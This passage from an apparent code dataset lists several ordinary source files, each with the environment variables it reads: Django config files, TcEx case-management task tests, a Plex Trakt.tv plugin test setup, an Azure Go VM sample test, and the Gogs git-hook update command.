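# test loader or filter further.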
|
[] |
[] |
[
"TMPDIR"
] |
[]
|
["TMPDIR"]
|
python
| 1 | 0 | |
config/wsgi.py
|
"""
WSGI config for jsngram project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
import sys
from django.core.wsgi import get_wsgi_application
# This allows easy placement of apps within the interior
# jsngram directory.
app_path = os.path.abspath(os.path.join(
os.path.dirname(os.path.abspath(__file__)), os.pardir))
sys.path.append(os.path.join(app_path, 'jsngram'))
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "config.settings.production"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
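# Illustrative note (editor's addition): a middleware wrapper only needs to accept the
# WSGI application and remain callable with (environ, start_response); e.g. a
# hypothetical LoggingMiddleware(application) would be assigned back to `application`
# exactly like the HelloWorldApplication example above.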
|
[] |
[] |
[
"DJANGO_SETTINGS_MODULE"
] |
[]
|
["DJANGO_SETTINGS_MODULE"]
|
python
| 1 | 0 | |
tests/case_management/test_task_interface.py
|
"""Test the TcEx Threat Intel Module."""
# standard library
import os
import time
from datetime import datetime, timedelta
from random import randint
# first-party
from tcex.case_management.tql import TQL
from .cm_helpers import CMHelper, TestCaseManagement
class TestTask(TestCaseManagement):
"""Test TcEx CM Task Interface."""
def setup_method(self):
"""Configure setup before all tests."""
self.cm_helper = CMHelper('task')
self.cm = self.cm_helper.cm
self.tcex = self.cm_helper.tcex
def teardown_method(self):
"""Configure teardown before all tests."""
if os.getenv('TEARDOWN_METHOD') is None:
self.cm_helper.cleanup()
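# Illustrative note (editor's addition): setting the TEARDOWN_METHOD environment
# variable to any value skips the per-test cleanup above, which is useful when
# inspecting the created cases and tasks after a test run.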
def test_task_api_options(self):
"""Test filter keywords."""
super().obj_api_options()
def test_task_code_gen(self):
"""Generate code and docstring from Options methods.
This is not truly a test case, but best place to store it for now.
"""
doc_string, filter_map, filter_class = super().obj_code_gen()
assert doc_string
assert filter_map
assert filter_class
def test_task_filter_keywords(self):
"""Test filter keywords."""
super().obj_filter_keywords()
def test_task_object_properties(self):
"""Test properties."""
super().obj_properties()
def test_task_object_properties_extra(self):
"""Test properties."""
super().obj_properties_extra()
def test_task_create_by_case_id(self, request):
"""Test Task Creation"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'workflow_phase': 0,
'workflow_step': 1,
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# get task from API to use in asserts
task = self.cm.task(id=task.id)
task.get()
# run assertions on returned data
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
assert task.workflow_phase == task_data.get('workflow_phase')
assert task.workflow_step == task_data.get('workflow_step')
def test_task_create_by_case_xid(self, request):
"""Test Task Creation"""
# create case
case_xid = f'{request.node.name}-{time.time()}'
self.cm_helper.create_case(xid=case_xid)
# task data
task_data = {
'case_xid': case_xid,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'workflow_phase': 0,
'workflow_step': 1,
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# get task from API to use in asserts
task = self.cm.task(id=task.id)
task.get()
# run assertions on returned data
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
assert task.workflow_phase == task_data.get('workflow_phase')
assert task.workflow_step == task_data.get('workflow_step')
def test_task_delete_by_id(self, request):
"""Test Artifact Deletion"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# get task from API to use in asserts
task = self.cm.task(id=task.id)
task.get()
# delete the task
task.delete()
# test that the task is deleted
try:
task.get()
assert False
except RuntimeError:
pass
def test_task_get_many(self, request):
"""Test Task Get Many"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# get task from API to use in asserts
task = self.cm.task(id=task.id)
task.get()
# iterate over all tasks looking for needle
for t in self.cm.tasks():
if t.name == task_data.get('name'):
assert task.description == task_data.get('description')
break
else:
assert False
def test_task_get_single_by_id(self, request):
"""Test Task Get Many"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'workflow_phase': 0,
'workflow_step': 1,
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
# add assignee
assignee_data = {'type': 'User', 'data': {'userName': os.getenv('API_ACCESS_ID')}}
task.assignee = assignee_data
# add note
notes_data = {
'data': [{'text': 'a note for test_task_get_single_by_id_properties'}],
}
task.notes = notes_data
# submit task
task.submit()
# get task from API to use in asserts
task = self.cm.task(id=task.id)
task.get()
# run assertions on returned data
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
assert task.workflow_phase == task_data.get('workflow_phase')
assert task.workflow_step == task_data.get('workflow_step')
def test_task_update_properties(self, request):
"""Test updating artifacts properties"""
case = self.cm_helper.create_case()
task_data = {
'case_id': case.id,
'completed_date': datetime.now().isoformat(),
'description': f'a description from {request.node.name}',
'due_date': (datetime.now() + timedelta(days=2)).isoformat(),
'name': f'name-{request.node.name}',
'note_text': f'a note for {request.node.name}',
'status': 'Open',
# 'workflow_phase': 0,
# 'workflow_step': 1,
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# task data updated
task_data = {
'assignee': {'user_name': os.getenv('API_ACCESS_ID')},
'description': f'a updated description from {request.node.name}',
'due_date': (datetime.now() + timedelta(days=3)).isoformat(),
'name': f'updated-name-{request.node.name}',
'status': 'Closed',
'workflow_phase': 1,
'workflow_step': 2,
}
task.assignee = self.cm.assignee(**task_data.get('assignee'))
task.description = task_data.get('description')
task.due_date = task_data.get('due_date')
task.name = task_data.get('name')
# task.workflow_phase = task_data.get('workflow_phase')
# task.workflow_step = task_data.get('workflow_step')
task.submit()
task.get(all_available_fields=True)
assert task.assignee.user_name == task_data.get('assignee').get('user_name')
assert task.description == task_data.get('description')
assert task_data.get('due_date')[:10] in task.due_date
assert task.name == task_data.get('name')
# assert task.workflow_phase == task_data.get('workflow_phase')
# assert task.workflow_step == task_data.get('workflow_step')
def test_task_task_config_mapping(self):
"""Test Task Get Many"""
# create case
# task config data
task_config_data = [
{
'artifactType': 'ASN',
'dataType': 'String',
'intelType': 'indicator-ASN',
'name': 'dummy_field',
'uiElement': 'String',
'uiLabel': 'ui_label?',
}
]
# create task
task_data = {'config_task': task_config_data}
task = self.cm.task(**task_data)
counter = 0
for config_task in task.config_task.config_tasks:
counter += 1
assert config_task.as_dict is not None
assert config_task.body == {}
assert config_task.artifact_type == 'ASN'
assert config_task.data_type == 'String'
assert config_task.intel_type == 'indicator-ASN'
assert config_task.name == 'dummy_field'
assert config_task.required is None
assert config_task.ui_element == 'String'
assert config_task.ui_label == 'ui_label?'
assert task.config_task.as_dict is not None
assert task.config_task.body == {}
assert counter == 1
def test_task_get_single_by_id_properties(self, request):
"""Test Task Get Many"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'case_xid': case.xid,
'completed_date': datetime.now().isoformat(),
'description': f'a description from {request.node.name}',
'due_date': (datetime.now() + timedelta(days=2)).isoformat(),
'name': f'name-{request.node.name}',
'note_text': f'a note for {request.node.name}',
'status': 'Open',
# 'workflow_phase': 0,
# 'workflow_step': 1,
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task()
# add properties
task.case_id = task_data.get('case_id')
task.case_xid = task_data.get('case_xid')
task.completed_date = task_data.get('completed_date')
task.description = task_data.get('description')
task.due_date = task_data.get('due_date')
task.name = task_data.get('name')
task.status = task_data.get('status')
# task.workflow_phase = task_data.get('workflow_phase')
# task.workflow_step = task_data.get('workflow_step')
task.xid = task_data.get('xid')
# add artifacts
artifact_data = {
'intel_type': 'indicator-ASN',
'summary': f'asn{randint(100, 999)}',
'type': 'ASN',
}
task.add_artifact(**artifact_data)
# add assignee
assignee = self.cm.assignee(type='User', user_name=os.getenv('API_ACCESS_ID'))
task.assignee = assignee
# add note
task.add_note(text=task_data.get('note_text'))
task.submit()
# get task from API to use in asserts
task = self.cm.task(id=task.id)
task.get(all_available_fields=True)
# run assertions on returned data
assert task.assignee.user_name == os.getenv('API_ACCESS_ID')
assert task.case_id == task_data.get('case_id')
assert task.case_xid is None  # not returned with task data
assert task_data.get('completed_date')[:10] in task.completed_date
assert task.description == task_data.get('description')
assert task_data.get('due_date')[:10] in task.due_date
assert task.name == task_data.get('name')
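# for/else: the else branch runs only if the loop completes without break, i.e. the note was never found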
for note in task.notes:
if note.text == task_data.get('note_text'):
break
else:
assert False, 'Note not found'
assert task.status == task_data.get('status')
# assert task.workflow_phase == task_data.get('workflow_phase')
# assert task.workflow_step == task_data.get('workflow_step')
assert task.xid == task_data.get('xid')
# assert read-only data
assert task.completed_by is None # not returned in the response
assert task.config_playbook is None # not returned in the response
assert task.config_task.config_tasks == [] # not returned in the response
assert task.dependent_on_id is None # not returned in the response
assert task.duration is None # not returned in the response
assert task.parent_case.id == task_data.get('case_id')
assert task.required is False
# test as_entity
assert task.as_entity.get('value') == task_data.get('name')
def test_task_get_by_tql_filter_automated(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.automated(TQL.Operator.EQ, False)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_case_id(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_case_severity(self, request):
"""Test Task Get by TQL"""
# create case
severity = 'Low'
case = self.cm_helper.create_case(severity=severity)
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.id(TQL.Operator.EQ, task.id)
tasks.filter.case_severity(TQL.Operator.EQ, severity)
tasks.filter.case_id(TQL.Operator.EQ, case.id)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
# unsure if there is a way to set completed by via UI
def test_task_get_by_tql_filter_completed_by(self, request):
"""Test Task Get by TQL"""
def test_task_get_by_tql_filter_completed_date(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'completed_date': datetime.now().isoformat(),
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.completed_date(
TQL.Operator.GT, (datetime.now() - timedelta(days=1)).strftime('%Y-%m-%d')
)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_config_playbook(self, request):
"""Test Task Get by TQL"""
def test_task_get_by_tql_filter_config_task(self, request):
"""Test Task Get by TQL"""
def test_task_get_by_tql_filter_description(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.description(TQL.Operator.EQ, task_data.get('description'))
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_due_date(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'due_date': (datetime.now() + timedelta(days=1)).isoformat(),
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.due_date(TQL.Operator.GT, datetime.now().strftime('%Y-%m-%d'))
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
# @mj - looking into an issue where artifact gets added to case and not task
# artifact
# def test_task_get_by_tql_filter_has_artifact(self, request):
# """Test Task Get by TQL"""
# # create case
# case = self.cm_helper.create_case()
# # task data
# task_data = {
# 'case_id': case.id,
# 'description': f'a description from {request.node.name}',
# 'name': f'name-{request.node.name}',
# 'xid': f'{request.node.name}-{time.time()}',
# }
# # create task
# task = self.cm.task(**task_data)
# # add artifacts
# artifact_data = {
# 'intel_type': 'indicator-ASN',
# 'summary': f'asn{randint(100, 999)}',
# 'type': 'ASN',
# }
# task.add_artifact(**artifact_data)
# # submit task
# task.submit()
# my_task = self.cm.task(id=task.id)
# my_task.get(all_available_fields=True)
# # get artifact id
# for artifact in task.artifacts:
# artifact_id = artifact.id
# # retrieve tasks using TQL
# tasks = self.cm.tasks()
# tasks.filter.id(TQL.Operator.EQ, task.id)
# tasks.filter.has_artifact.id(TQL.Operator.EQ, artifact_id)
# for task in tasks:
# assert task.description == task_data.get('description')
# assert task.name == task_data.get('name')
# break
# else:
# assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_has_case(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.id(TQL.Operator.EQ, task.id)
tasks.filter.has_case.id(TQL.Operator.EQ, case.id)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_has_note(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.add_note(text='blah')
task.submit()
# get note id
for note in task.notes:
note_id = note.id
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.id(TQL.Operator.EQ, task.id)
tasks.filter.has_note.id(TQL.Operator.EQ, note_id)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_id(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.id(TQL.Operator.EQ, task.id)
tasks.filter.description(TQL.Operator.EQ, task_data.get('description'))
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_name(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.name(TQL.Operator.EQ, task_data.get('name'))
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_required(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.required(TQL.Operator.EQ, False)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_status(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'status': 'Open',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.status(TQL.Operator.EQ, task_data.get('status'))
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_target_id(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
assignee = self.cm.assignee(type='User', user_name=os.getenv('API_ACCESS_ID'))
task_data = {
'assignee': assignee,
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'status': 'Open',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.target_id(TQL.Operator.EQ, 5)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_target_type(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
assignee = self.cm.assignee(type='User', user_name=os.getenv('API_ACCESS_ID'))
task_data = {
'assignee': assignee,
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'status': 'Open',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.target_type(TQL.Operator.EQ, 'User')
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_workflow_phase(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'status': 'Open',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.workflow_phase(TQL.Operator.EQ, 0)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_workflow_step(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'status': 'Open',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.workflow_step(TQL.Operator.EQ, 1)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_xid(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.xid(TQL.Operator.EQ, task_data.get('xid'))
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
|
[] |
[] |
[
"TEARDOWN_METHOD",
"API_ACCESS_ID"
] |
[]
|
["TEARDOWN_METHOD", "API_ACCESS_ID"]
|
python
| 2 | 0 | |
manage.py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'django_food_rating_app.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
Trakttv.bundle/Contents/Tests/tests/__init__.py
|
import logging
logging.basicConfig(level=logging.DEBUG)
import os
import sys
import tempfile
#
# Directories / Paths
#
CURRENT_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..')
# Build plugin paths
CODE_DIR = os.path.abspath(os.path.join(CURRENT_DIR, '..', 'Code'))
LIBRARIES_DIR = os.path.abspath(os.path.join(CURRENT_DIR, '..', 'Libraries'))
PLUGIN_DIR = os.path.abspath(os.path.join(LIBRARIES_DIR, 'Shared', 'plugin'))
# Create temporary directory
TEMP_DIR = tempfile.mkdtemp()
# Update `sys.path`
sys.path.insert(0, os.path.join(LIBRARIES_DIR, 'Shared'))
sys.path.insert(0, CODE_DIR)
#
# Environment
#
from plex_mock.framework import Core
from plugin.core.environment import Environment
from plugin.core.constants import PLUGIN_IDENTIFIER
# Setup environment
Environment.setup(Core(CODE_DIR), {
'trakt.token': 'trakt.token'
}, None, {
'username': 'username',
'password': 'password'
})
# Build directory structure for "Plug-in Support"
PLUGIN_SUPPORT = os.path.join(TEMP_DIR, 'Plug-in Support')
os.makedirs(os.path.join(PLUGIN_SUPPORT, 'Caches', PLUGIN_IDENTIFIER))
os.makedirs(os.path.join(PLUGIN_SUPPORT, 'Data', PLUGIN_IDENTIFIER))
os.makedirs(os.path.join(PLUGIN_SUPPORT, 'Databases'))
Environment.path.plugin_support = PLUGIN_SUPPORT
# Setup native libraries
from plugin.core.libraries.manager import LibrariesManager
LibrariesManager.setup(cache=False)
LibrariesManager.test()
# Setup database proxy
from plugin.core.database.manager import DatabaseManager
from tests.helpers.database import DATABASE_PROXY
db_path = os.path.abspath(Environment.path.plugin_database)
DatabaseManager._cache['peewee'][db_path] = DATABASE_PROXY
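# Seeding the cache with the proxy means the plugin resolves this database path to the test DATABASE_PROXY instead of opening a real peewee database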
# Configure plex.database.py
os.environ['LIBRARY_DB'] = os.path.join(
Environment.path.plugin_support, 'Databases',
'com.plexapp.plugins.library.db'
)
#
# Preferences
#
from plugin.preferences.main import Preferences
@classmethod
def preferences_get(cls, key, account=None):
return None
# Patch `Preferences.get` method
Preferences.get = preferences_get
#
# Modules
#
from plugin.core.importer import import_modules
from plugin.modules.core.manager import ModuleManager
# ModuleManager
ModuleManager.initialize()
ModuleManager.start([
'matcher'
])
# Scrobbler
import_modules(os.path.join(PLUGIN_DIR, 'scrobbler', 'handlers'), exclude=[
'__init__.py'
])
|
[] |
[] |
[
"LIBRARY_DB"
] |
[]
|
["LIBRARY_DB"]
|
python
| 1 | 0 | |
compute/compute_test.go
|
// Copyright (c) Microsoft and contributors. All rights reserved.
//
// This source code is licensed under the MIT license found in the
// LICENSE file in the root directory of this source tree.
package compute
import (
"context"
"flag"
"fmt"
"log"
"os"
"testing"
"github.com/Azure-Samples/azure-sdk-for-go-samples/helpers"
"github.com/Azure-Samples/azure-sdk-for-go-samples/network"
"github.com/Azure-Samples/azure-sdk-for-go-samples/resources"
"github.com/subosito/gotenv"
)
var (
vmName = "az-samples-go-" + helpers.GetRandomLetterSequence(10)
nicName = "nic1"
username = "az-samples-go-user"
password = "NoSoupForYou1!"
sshPublicKeyPath = os.Getenv("HOME") + "/.ssh/id_rsa.pub"
virtualNetworkName = "vnet1"
subnet1Name = "subnet1"
subnet2Name = "subnet2"
nsgName = "nsg1"
ipName = "ip1"
)
func TestMain(m *testing.M) {
err := parseArgs()
if err != nil {
log.Fatalln("failed to parse args")
}
ctx := context.Background()
defer resources.Cleanup(ctx)
_, err = resources.CreateGroup(ctx, helpers.ResourceGroupName())
if err != nil {
helpers.PrintAndLog(err.Error())
}
helpers.PrintAndLog(fmt.Sprintf("resource group created on location: %s", helpers.Location()))
os.Exit(m.Run())
}
func parseArgs() error {
gotenv.Load()
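	// Default the vnet name from the AZ_VNET_NAME environment variable; the -vnetName flag can override it, and "vnet1" is used below as a fallback when neither is set.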
virtualNetworkName = os.Getenv("AZ_VNET_NAME")
flag.StringVar(&virtualNetworkName, "vnetName", virtualNetworkName, "Specify a name for the vnet.")
err := helpers.ParseArgs()
if err != nil {
return fmt.Errorf("cannot parse args: %v", err)
}
if len(virtualNetworkName) == 0 {
virtualNetworkName = "vnet1"
}
return nil
}
func ExampleCreateVM() {
ctx := context.Background()
_, err := network.CreateVirtualNetworkAndSubnets(ctx, virtualNetworkName, subnet1Name, subnet2Name)
if err != nil {
helpers.PrintAndLog(err.Error())
}
helpers.PrintAndLog("created vnet and 2 subnets")
_, err = network.CreateNetworkSecurityGroup(ctx, nsgName)
if err != nil {
helpers.PrintAndLog(err.Error())
}
helpers.PrintAndLog("created network security group")
_, err = network.CreatePublicIP(ctx, ipName)
if err != nil {
helpers.PrintAndLog(err.Error())
}
helpers.PrintAndLog("created public IP")
_, err = network.CreateNIC(ctx, virtualNetworkName, subnet1Name, nsgName, ipName, nicName)
if err != nil {
helpers.PrintAndLog(err.Error())
}
helpers.PrintAndLog("created nic")
_, err = CreateVM(ctx, vmName, nicName, username, password, sshPublicKeyPath)
if err != nil {
helpers.PrintAndLog(err.Error())
}
helpers.PrintAndLog("created VM")
// Output:
// created vnet and 2 subnets
// created network security group
// created public IP
// created nic
// created VM
}
|
[
"\"HOME\"",
"\"AZ_VNET_NAME\""
] |
[] |
[
"HOME",
"AZ_VNET_NAME"
] |
[]
|
["HOME", "AZ_VNET_NAME"]
|
go
| 2 | 0 | |
cmd/update.go
|
// Copyright 2014 The Gogs Authors. All rights reserved.
// Use of this source code is governed by a MIT-style
// license that can be found in the LICENSE file.
package cmd
import (
"os"
"github.com/codegangsta/cli"
"github.com/gogits/gogs/models"
"github.com/gogits/gogs/modules/log"
"github.com/gogits/gogs/modules/setting"
)
var CmdUpdate = cli.Command{
Name: "update",
Usage: "This command should only be called by Git hook",
Description: `Update get pushed info and insert into database`,
Action: runUpdate,
Flags: []cli.Flag{
stringFlag("config, c", "custom/conf/app.ini", "Custom configuration file path"),
},
}
func runUpdate(c *cli.Context) {
if c.IsSet("config") {
setting.CustomConf = c.String("config")
}
setup("update.log")
if len(os.Getenv("SSH_ORIGINAL_COMMAND")) == 0 {
log.GitLogger.Trace("SSH_ORIGINAL_COMMAND is empty")
return
}
args := c.Args()
if len(args) != 3 {
log.GitLogger.Fatal(2, "Arguments received are not equal to three")
} else if len(args[0]) == 0 {
log.GitLogger.Fatal(2, "First argument 'refName' is empty, shouldn't use")
}
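	// The update hook receives refName, oldCommitID and newCommitID as arguments; the push UUID is supplied via the "uuid" environment variable.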
task := models.UpdateTask{
UUID: os.Getenv("uuid"),
RefName: args[0],
OldCommitID: args[1],
NewCommitID: args[2],
}
if err := models.AddUpdateTask(&task); err != nil {
log.GitLogger.Fatal(2, "AddUpdateTask: %v", err)
}
}
|
[
"\"SSH_ORIGINAL_COMMAND\"",
"\"uuid\""
] |
[] |
[
"uuid",
"SSH_ORIGINAL_COMMAND"
] |
[]
|
